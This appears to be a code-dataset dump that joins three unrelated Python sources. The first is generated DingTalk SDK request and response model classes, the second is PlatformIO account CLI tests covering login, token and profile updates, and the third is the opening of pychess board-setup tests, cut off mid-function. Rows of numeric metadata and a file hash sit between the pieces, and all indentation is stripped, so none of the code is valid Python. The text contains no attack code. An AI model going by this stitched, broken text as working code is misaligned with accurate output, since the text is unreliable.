if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetUserInfoResponseBody(TeaModel):
def __init__(
self,
is_real_name: str = None,
user_real_name: str = None,
):
self.is_real_name = is_real_name
self.user_real_name = user_real_name
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.is_real_name is not None:
result['isRealName'] = self.is_real_name
if self.user_real_name is not None:
result['userRealName'] = self.user_real_name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('isRealName') is not None:
self.is_real_name = m.get('isRealName')
if m.get('userRealName') is not None:
self.user_real_name = m.get('userRealName')
return self
class GetUserInfoResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetUserInfoResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetUserInfoResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetExecuteUrlHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetExecuteUrlRequest(TeaModel):
def __init__(
self,
task_id: str = None,
sign_container: int = None,
ding_corp_id: str = None,
account: str = None,
):
self.task_id = task_id
self.sign_container = sign_container
self.ding_corp_id = ding_corp_id
self.account = account
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.task_id is not None:
result['taskId'] = self.task_id
if self.sign_container is not None:
result['signContainer'] = self.sign_container
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
if self.account is not None:
result['account'] = self.account
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('taskId') is not None:
self.task_id = m.get('taskId')
if m.get('signContainer') is not None:
self.sign_container = m.get('signContainer')
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
if m.get('account') is not None:
self.account = m.get('account')
return self
class GetExecuteUrlResponseBody(TeaModel):
def __init__(
self,
mobile_url: str = None,
pc_url: str = None,
long_url: str = None,
short_url: str = None,
):
self.mobile_url = mobile_url
self.pc_url = pc_url
self.long_url = long_url
self.short_url = short_url
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.mobile_url is not None:
result['mobileUrl'] = self.mobile_url
if self.pc_url is not None:
result['pcUrl'] = self.pc_url
if self.long_url is not None:
result['longUrl'] = self.long_url
if self.short_url is not None:
result['shortUrl'] = self.short_url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('mobileUrl') is not None:
self.mobile_url = m.get('mobileUrl')
if m.get('pcUrl') is not None:
self.pc_url = m.get('pcUrl')
if m.get('longUrl') is not None:
self.long_url = m.get('longUrl')
if m.get('shortUrl') is not None:
self.short_url = m.get('shortUrl')
return self
class GetExecuteUrlResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetExecuteUrlResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetExecuteUrlResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetContractMarginHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetContractMarginResponseBody(TeaModel):
def __init__(
self,
margin: float = None,
):
self.margin = margin
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.margin is not None:
result['margin'] = self.margin
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('margin') is not None:
self.margin = m.get('margin')
return self
class GetContractMarginResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetContractMarginResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetContractMarginResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class CreateDevelopersHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class CreateDevelopersRequest(TeaModel):
def __init__(
self,
ding_corp_id: str = None,
notice_url: str = None,
):
self.ding_corp_id = ding_corp_id
self.notice_url = notice_url
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
if self.notice_url is not None:
result['noticeUrl'] = self.notice_url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
if m.get('noticeUrl') is not None:
self.notice_url = m.get('noticeUrl')
return self
class CreateDevelopersResponseBody(TeaModel):
def __init__(
self,
data: bool = None,
):
self.data = data
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.data is not None:
result['data'] = self.data
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('data') is not None:
self.data = m.get('data')
return self
class CreateDevelopersResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: CreateDevelopersResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = CreateDevelopersResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class CorpRealnameHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class CorpRealnameRequest(TeaModel):
def __init__(
self,
ding_corp_id: str = None,
user_id: str = None,
redirect_url: str = None,
):
self.ding_corp_id = ding_corp_id
self.user_id = user_id
self.redirect_url = redirect_url
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
if self.user_id is not None:
result['userId'] = self.user_id
if self.redirect_url is not None:
result['redirectUrl'] = self.redirect_url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
if m.get('userId') is not None:
self.user_id = m.get('userId')
if m.get('redirectUrl') is not None:
self.redirect_url = m.get('redirectUrl')
return self
class CorpRealnameResponseBody(TeaModel):
def __init__(
self,
task_id: str = None,
pc_url: str = None,
mobile_url: str = None,
):
self.task_id = task_id
self.pc_url = pc_url
self.mobile_url = mobile_url
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.task_id is not None:
result['taskId'] = self.task_id
if self.pc_url is not None:
result['pcUrl'] = self.pc_url
if self.mobile_url is not None:
result['mobileUrl'] = self.mobile_url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('taskId') is not None:
self.task_id = m.get('taskId')
if m.get('pcUrl') is not None:
self.pc_url = m.get('pcUrl')
if m.get('mobileUrl') is not None:
self.mobile_url = m.get('mobileUrl')
return self
class CorpRealnameResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: CorpRealnameResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = CorpRealnameResponseBody()
self.body = temp_model.from_map(m['body'])
return self
| 30.76549 | 84 | 0.576981 | 14,965 | 117,678 | 4.337721 | 0.023321 | 0.04945 | 0.08901 | 0.060542 | 0.826678 | 0.802231 | 0.791231 | 0.784176 | 0.776319 | 0.767569 | 0 | 0.000289 | 0.32362 | 117,678 | 3,824 | 85 | 30.773536 | 0.815265 | 0.004767 | 0 | 0.847557 | 1 | 0 | 0.076863 | 0.01581 | 0 | 0 | 0 | 0 | 0 | 1 | 0.113791 | false | 0.018862 | 0.000618 | 0 | 0.2282 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
1be778eb7148bcb142b6062c5b58b3d1b67fe5d3 | 20,403 | py | Python | tests/commands/test_account.py | Teja-Nagoori/platformio-core | e0e97a36297852128016b2ba8360d77f64b276db | [
"Apache-2.0"
] | 1 | 2020-06-09T05:03:45.000Z | 2020-06-09T05:03:45.000Z | tests/commands/test_account.py | Teja7048/platformio-core | e0e97a36297852128016b2ba8360d77f64b276db | [
"Apache-2.0"
] | null | null | null | tests/commands/test_account.py | Teja7048/platformio-core | e0e97a36297852128016b2ba8360d77f64b276db | [
"Apache-2.0"
] | 1 | 2020-06-05T18:50:48.000Z | 2020-06-05T18:50:48.000Z | # Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import time
import pytest
from platformio.commands.account import cli as cmd_account
pytestmark = pytest.mark.skipif(
not (
os.environ.get("PLATFORMIO_TEST_ACCOUNT_LOGIN")
and os.environ.get("PLATFORMIO_TEST_ACCOUNT_PASSWORD")
),
reason="requires PLATFORMIO_TEST_ACCOUNT_LOGIN, PLATFORMIO_TEST_ACCOUNT_PASSWORD environ variables",
)
@pytest.fixture(scope="session")
def credentials():
return {
"login": os.environ["PLATFORMIO_TEST_ACCOUNT_LOGIN"],
"password": os.environ["PLATFORMIO_TEST_ACCOUNT_PASSWORD"],
}
def test_account_register_with_already_exists_username(
clirunner, credentials, isolated_pio_home
):
username = credentials["login"]
email = "test@test.com"
if "@" in credentials["login"]:
username = "Testusername"
email = credentials["login"]
result = clirunner.invoke(
cmd_account,
[
"register",
"-u",
username,
"-e",
email,
"-p",
credentials["password"],
"--firstname",
"First",
"--lastname",
"Last",
],
)
assert result.exit_code > 0
assert result.exception
assert "User with same username already exists" in str(
result.exception
) or "User with same email already exists" in str(result.exception)
@pytest.mark.skip_ci
def test_account_login_with_invalid_creds(clirunner, credentials, isolated_pio_home):
result = clirunner.invoke(cmd_account, ["login", "-u", "123", "-p", "123"])
assert result.exit_code > 0
assert result.exception
assert "Invalid user credentials" in str(result.exception)
def test_account_login(clirunner, credentials, validate_cliresult, isolated_pio_home):
try:
result = clirunner.invoke(
cmd_account,
["login", "-u", credentials["login"], "-p", credentials["password"]],
)
validate_cliresult(result)
assert "Successfully logged in!" in result.output
with open(str(isolated_pio_home.join("appstate.json"))) as fp:
appstate = json.load(fp)
assert appstate.get("account")
assert appstate.get("account").get("email")
assert appstate.get("account").get("username")
assert appstate.get("account").get("auth")
assert appstate.get("account").get("auth").get("access_token")
assert appstate.get("account").get("auth").get("access_token_expire")
assert appstate.get("account").get("auth").get("refresh_token")
result = clirunner.invoke(
cmd_account,
["login", "-u", credentials["login"], "-p", credentials["password"]],
)
assert result.exit_code > 0
assert result.exception
assert "You are already authorized with" in str(result.exception)
finally:
clirunner.invoke(cmd_account, ["logout"])
def test_account_logout(clirunner, credentials, validate_cliresult, isolated_pio_home):
try:
result = clirunner.invoke(
cmd_account,
["login", "-u", credentials["login"], "-p", credentials["password"]],
)
validate_cliresult(result)
result = clirunner.invoke(cmd_account, ["logout"])
validate_cliresult(result)
assert "Successfully logged out" in result.output
result = clirunner.invoke(cmd_account, ["logout"])
assert result.exit_code > 0
assert result.exception
assert "You are not authorized! Please log in to PIO Account" in str(
result.exception
)
finally:
clirunner.invoke(cmd_account, ["logout"])
@pytest.mark.skip_ci
def test_account_password_change_with_invalid_old_password(
clirunner, credentials, validate_cliresult
):
try:
result = clirunner.invoke(
cmd_account,
["login", "-u", credentials["login"], "-p", credentials["password"]],
)
validate_cliresult(result)
result = clirunner.invoke(
cmd_account,
["password", "--old-password", "test", "--new-password", "test"],
)
assert result.exit_code > 0
assert result.exception
assert (
"Invalid request data for new_password -> "
"'Password must contain at least 8 "
"characters including a number and a lowercase letter'"
in str(result.exception)
)
finally:
clirunner.invoke(cmd_account, ["logout"])
def test_account_password_change_with_invalid_new_password_format(
clirunner, credentials, validate_cliresult
):
try:
result = clirunner.invoke(
cmd_account,
["login", "-u", credentials["login"], "-p", credentials["password"]],
)
validate_cliresult(result)
result = clirunner.invoke(
cmd_account,
[
"password",
"--old-password",
credentials["password"],
"--new-password",
"test",
],
)
assert result.exit_code > 0
assert result.exception
assert (
"Invalid request data for new_password -> "
"'Password must contain at least 8 characters"
" including a number and a lowercase letter'" in str(result.exception)
)
finally:
clirunner.invoke(cmd_account, ["logout"])
@pytest.mark.skip_ci
def test_account_password_change(
clirunner, credentials, validate_cliresult, isolated_pio_home
):
try:
result = clirunner.invoke(
cmd_account,
[
"password",
"--old-password",
credentials["password"],
"--new-password",
"Testpassword123",
],
)
assert result.exit_code > 0
assert result.exception
assert "You are not authorized! Please log in to PIO Account" in str(
result.exception
)
result = clirunner.invoke(
cmd_account,
["login", "-u", credentials["login"], "-p", credentials["password"]],
)
validate_cliresult(result)
result = clirunner.invoke(
cmd_account,
[
"password",
"--old-password",
credentials["password"],
"--new-password",
"Testpassword123",
],
)
validate_cliresult(result)
assert "Password successfully changed!" in result.output
result = clirunner.invoke(cmd_account, ["logout"])
validate_cliresult(result)
result = clirunner.invoke(
cmd_account, ["login", "-u", credentials["login"], "-p", "Testpassword123"],
)
validate_cliresult(result)
result = clirunner.invoke(
cmd_account,
[
"password",
"--old-password",
"Testpassword123",
"--new-password",
credentials["password"],
],
)
validate_cliresult(result)
assert "Password successfully changed!" in result.output
finally:
clirunner.invoke(cmd_account, ["logout"])
@pytest.mark.skip_ci
def test_account_token_with_invalid_password(
clirunner, credentials, validate_cliresult
):
try:
result = clirunner.invoke(
cmd_account, ["token", "--password", credentials["password"],],
)
assert result.exit_code > 0
assert result.exception
assert "You are not authorized! Please log in to PIO Account" in str(
result.exception
)
result = clirunner.invoke(
cmd_account,
["login", "-u", credentials["login"], "-p", credentials["password"]],
)
validate_cliresult(result)
result = clirunner.invoke(cmd_account, ["token", "--password", "test",],)
assert result.exit_code > 0
assert result.exception
assert "Invalid user password" in str(result.exception)
finally:
clirunner.invoke(cmd_account, ["logout"])
def test_account_token(clirunner, credentials, validate_cliresult, isolated_pio_home):
try:
result = clirunner.invoke(
cmd_account,
["login", "-u", credentials["login"], "-p", credentials["password"]],
)
validate_cliresult(result)
result = clirunner.invoke(
cmd_account, ["token", "--password", credentials["password"],],
)
validate_cliresult(result)
assert "Personal Authentication Token:" in result.output
token = result.output.strip().split(": ")[-1]
result = clirunner.invoke(
cmd_account,
["token", "--password", credentials["password"], "--json-output"],
)
validate_cliresult(result)
json_result = json.loads(result.output.strip())
assert json_result
assert json_result.get("status") == "success"
assert json_result.get("result") == token
token = json_result.get("result")
clirunner.invoke(cmd_account, ["logout"])
result = clirunner.invoke(
cmd_account, ["token", "--password", credentials["password"],],
)
assert result.exit_code > 0
assert result.exception
assert "You are not authorized! Please log in to PIO Account" in str(
result.exception
)
os.environ["PLATFORMIO_AUTH_TOKEN"] = token
result = clirunner.invoke(
cmd_account,
["token", "--password", credentials["password"], "--json-output"],
)
validate_cliresult(result)
json_result = json.loads(result.output.strip())
assert json_result
assert json_result.get("status") == "success"
assert json_result.get("result") == token
os.environ.pop("PLATFORMIO_AUTH_TOKEN")
finally:
clirunner.invoke(cmd_account, ["logout"])
@pytest.mark.skip_ci
def test_account_token_with_refreshing(
clirunner, credentials, validate_cliresult, isolated_pio_home
):
try:
result = clirunner.invoke(
cmd_account,
["login", "-u", credentials["login"], "-p", credentials["password"]],
)
validate_cliresult(result)
result = clirunner.invoke(
cmd_account,
["token", "--password", credentials["password"], "--json-output"],
)
validate_cliresult(result)
json_result = json.loads(result.output.strip())
assert json_result
assert json_result.get("status") == "success"
assert json_result.get("result")
token = json_result.get("result")
result = clirunner.invoke(
cmd_account,
[
"token",
"--password",
credentials["password"],
"--json-output",
"--regenerate",
],
)
validate_cliresult(result)
json_result = json.loads(result.output.strip())
assert json_result
assert json_result.get("status") == "success"
assert json_result.get("result")
assert token != json_result.get("result")
finally:
clirunner.invoke(cmd_account, ["logout"])
def test_account_summary(clirunner, credentials, validate_cliresult, isolated_pio_home):
try:
result = clirunner.invoke(cmd_account, ["show"],)
assert result.exit_code > 0
assert result.exception
assert "You are not authorized! Please log in to PIO Account" in str(
result.exception
)
result = clirunner.invoke(
cmd_account,
["login", "-u", credentials["login"], "-p", credentials["password"]],
)
validate_cliresult(result)
result = clirunner.invoke(cmd_account, ["show", "--json-output", "--offline"])
validate_cliresult(result)
json_result = json.loads(result.output.strip())
assert not json_result.get("user_id")
assert json_result.get("profile")
assert json_result.get("profile").get("username")
assert json_result.get("profile").get("email")
assert not json_result.get("packages")
assert not json_result.get("subscriptions")
result = clirunner.invoke(cmd_account, ["show"])
validate_cliresult(result)
assert credentials["login"] in result.output
assert "Community" in result.output
assert "100 Concurrent Remote Agents" in result.output
result = clirunner.invoke(cmd_account, ["show", "--json-output"])
validate_cliresult(result)
json_result = json.loads(result.output.strip())
assert json_result.get("user_id")
assert json_result.get("profile")
assert json_result.get("profile").get("username")
assert json_result.get("profile").get("email")
assert credentials["login"] == json_result.get("profile").get(
"username"
) or credentials["login"] == json_result.get("profile").get("email")
assert json_result.get("profile").get("firstname")
assert json_result.get("profile").get("lastname")
assert json_result.get("packages")
assert json_result.get("packages")[0].get("name")
assert json_result.get("packages")[0].get("path")
assert json_result.get("subscriptions") is not None
result = clirunner.invoke(cmd_account, ["show", "--json-output", "--offline"])
validate_cliresult(result)
json_result = json.loads(result.output.strip())
assert json_result.get("user_id")
assert json_result.get("profile")
assert json_result.get("profile").get("username")
assert json_result.get("profile").get("email")
assert credentials["login"] == json_result.get("profile").get(
"username"
) or credentials["login"] == json_result.get("profile").get("email")
assert json_result.get("profile").get("firstname")
assert json_result.get("profile").get("lastname")
assert json_result.get("packages")
assert json_result.get("packages")[0].get("name")
assert json_result.get("packages")[0].get("path")
assert json_result.get("subscriptions") is not None
finally:
clirunner.invoke(cmd_account, ["logout"])
@pytest.mark.skip_ci
def test_account_profile_update_with_invalid_password(
clirunner, credentials, validate_cliresult
):
try:
result = clirunner.invoke(
cmd_account, ["update", "--current-password", credentials["password"]],
)
assert result.exit_code > 0
assert result.exception
assert "You are not authorized! Please log in to PIO Account" in str(
result.exception
)
result = clirunner.invoke(
cmd_account,
["login", "-u", credentials["login"], "-p", credentials["password"]],
)
validate_cliresult(result)
firstname = "First " + str(int(time.time() * 1000))
result = clirunner.invoke(
cmd_account,
["update", "--current-password", "test", "--firstname", firstname],
)
assert result.exit_code > 0
assert result.exception
assert "Invalid user password" in str(result.exception)
finally:
clirunner.invoke(cmd_account, ["logout"])
@pytest.mark.skip_ci
def test_account_profile_update_only_firstname_and_lastname(
clirunner, credentials, validate_cliresult, isolated_pio_home
):
try:
result = clirunner.invoke(
cmd_account, ["update", "--current-password", credentials["password"]],
)
assert result.exit_code > 0
assert result.exception
assert "You are not authorized! Please log in to PIO Account" in str(
result.exception
)
result = clirunner.invoke(
cmd_account,
["login", "-u", credentials["login"], "-p", credentials["password"]],
)
validate_cliresult(result)
firstname = "First " + str(int(time.time() * 1000))
lastname = "Last" + str(int(time.time() * 1000))
result = clirunner.invoke(
cmd_account,
[
"update",
"--current-password",
credentials["password"],
"--firstname",
firstname,
"--lastname",
lastname,
],
)
validate_cliresult(result)
assert "Profile successfully updated!" in result.output
result = clirunner.invoke(cmd_account, ["show", "--json-output"])
validate_cliresult(result)
json_result = json.loads(result.output.strip())
assert json_result.get("profile").get("firstname") == firstname
assert json_result.get("profile").get("lastname") == lastname
finally:
clirunner.invoke(cmd_account, ["logout"])
@pytest.mark.skip_ci
def test_account_profile_update(
clirunner, credentials, validate_cliresult, isolated_pio_home
):
try:
result = clirunner.invoke(
cmd_account, ["update", "--current-password", credentials["password"]],
)
assert result.exit_code > 0
assert result.exception
assert "You are not authorized! Please log in to PIO Account" in str(
result.exception
)
result = clirunner.invoke(
cmd_account,
["login", "-u", credentials["login"], "-p", credentials["password"]],
)
validate_cliresult(result)
result = clirunner.invoke(cmd_account, ["show", "--json-output"])
validate_cliresult(result)
json_result = json.loads(result.output.strip())
firstname = "First " + str(int(time.time() * 1000))
lastname = "Last" + str(int(time.time() * 1000))
old_username = json_result.get("profile").get("username")
new_username = "username" + str(int(time.time() * 1000))[-5:]
result = clirunner.invoke(
cmd_account,
[
"update",
"--current-password",
credentials["password"],
"--firstname",
firstname,
"--lastname",
lastname,
"--username",
new_username,
],
)
validate_cliresult(result)
assert "Profile successfully updated!" in result.output
assert "Please re-login." in result.output
result = clirunner.invoke(cmd_account, ["show"],)
assert result.exit_code > 0
assert result.exception
assert "You are not authorized! Please log in to PIO Account" in str(
result.exception
)
result = clirunner.invoke(
cmd_account, ["login", "-u", new_username, "-p", credentials["password"]],
)
validate_cliresult(result)
result = clirunner.invoke(
cmd_account,
[
"update",
"--current-password",
credentials["password"],
"--username",
old_username,
],
)
validate_cliresult(result)
assert "Profile successfully updated!" in result.output
assert "Please re-login." in result.output
result = clirunner.invoke(
cmd_account, ["login", "-u", old_username, "-p", credentials["password"]],
)
validate_cliresult(result)
finally:
clirunner.invoke(cmd_account, ["logout"])
| 33.447541 | 104 | 0.590943 | 2,053 | 20,403 | 5.72187 | 0.096931 | 0.053631 | 0.095003 | 0.131949 | 0.85358 | 0.825402 | 0.797821 | 0.770495 | 0.766579 | 0.738486 | 0 | 0.005299 | 0.287801 | 20,403 | 609 | 105 | 33.502463 | 0.803111 | 0.028574 | 0 | 0.70428 | 0 | 0 | 0.182773 | 0.011411 | 0 | 0 | 0 | 0 | 0.215953 | 1 | 0.029183 | false | 0.140078 | 0.009728 | 0.001946 | 0.040856 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
4024b228bff3508d2ab403f4c478787518c8695f | 10,488 | py | Python | tests/test_setupboard.py | mpunkenhofer/pychess | 29e48d3ec68ba55e87b8d5a07544d96bc14ab558 | [
"MIT"
] | null | null | null | tests/test_setupboard.py | mpunkenhofer/pychess | 29e48d3ec68ba55e87b8d5a07544d96bc14ab558 | [
"MIT"
] | null | null | null | tests/test_setupboard.py | mpunkenhofer/pychess | 29e48d3ec68ba55e87b8d5a07544d96bc14ab558 | [
"MIT"
] | null | null | null | # Mathias Punkenhofer
# code.mpunkenhofer@gmail.com
#
import unittest
import pychess
class SetupBoardTests(unittest.TestCase):
def test_setup_empty_fen(self):
board = pychess.board.SetupBoard()
str_board = pychess.util.board.to_string_array(board)
self.assertEqual(str_board, ['........',
'........',
'........',
'........',
'........',
'........',
'........',
'........'
])
def test_setup_standard_position(self):
board = pychess.board.SetupBoard('rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1')
str_board = pychess.util.board.to_string_array(board)
self.assertEqual(str_board, ['rnbqkbnr',
'pppppppp',
'........',
'........',
'........',
'........',
'PPPPPPPP',
'RNBQKBNR'
])
def test_setup_position_1_e4(self):
board = pychess.board.SetupBoard('rnbqkbnr/pppppppp/8/8/4P3/8/PPPP1PPP/RNBQKBNR b KQkq e3 0 1')
str_board = pychess.util.board.to_string_array(board)
self.assertEqual(str_board, ['rnbqkbnr',
'pppppppp',
'........',
'........',
'....P...',
'........',
'PPPP.PPP',
'RNBQKBNR'
])
def test_setup_position_1_e4_c5(self):
board = pychess.board.SetupBoard('rnbqkbnr/pp1ppppp/8/2p5/4P3/8/PPPP1PPP/RNBQKBNR w KQkq c6 0 2')
str_board = pychess.util.board.to_string_array(board)
self.assertEqual(str_board, ['rnbqkbnr',
'pp.ppppp',
'........',
'..p.....',
'....P...',
'........',
'PPPP.PPP',
'RNBQKBNR'
])
def test_setup_position_1_e4_c5_2_Nf3(self):
board = pychess.board.SetupBoard('rnbqkbnr/pp1ppppp/8/2p5/4P3/5N2/PPPP1PPP/RNBQKB1R b KQkq - 1 2')
str_board = pychess.util.board.to_string_array(board)
self.assertEqual(str_board, ['rnbqkbnr',
'pp.ppppp',
'........',
'..p.....',
'....P...',
'.....N..',
'PPPP.PPP',
'RNBQKB.R'
])
def test_setup_position_without_pieces(self):
